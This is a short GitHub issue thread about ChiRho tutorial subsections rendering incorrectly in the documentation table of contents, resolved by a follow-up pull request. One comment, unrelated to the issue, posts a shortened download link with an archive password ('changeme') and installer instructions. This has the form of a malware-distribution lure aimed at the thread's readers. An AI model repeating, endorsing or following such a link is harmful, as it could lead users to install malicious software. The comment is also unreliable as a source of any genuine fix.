### ISSUE TITLE
`Explainable Reasoning with ChiRho` tutorial subsections incorrectly expand into documentation table of content

### ISSUE THREAD

**Issue by SamWitty** [BasisResearch/chirho#567]
See title and the following screenshot.

<img width="297" alt="Screenshot 2024-08-27 at 12 49 27 PM" src="https://github.com/user-attachments/assets/857611cc-de47-4b36-a5d9-274c55ba9a43">

Also, the outline does not render the bullets.

<img width="466" alt="Screenshot 2024-08-27 at 12 49 11 PM" src="https://github.com/user-attachments/assets/16928d14-a4bb-4449-908a-b14fcab9072c">

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by SamWitty** [comment]
Addressed by #568
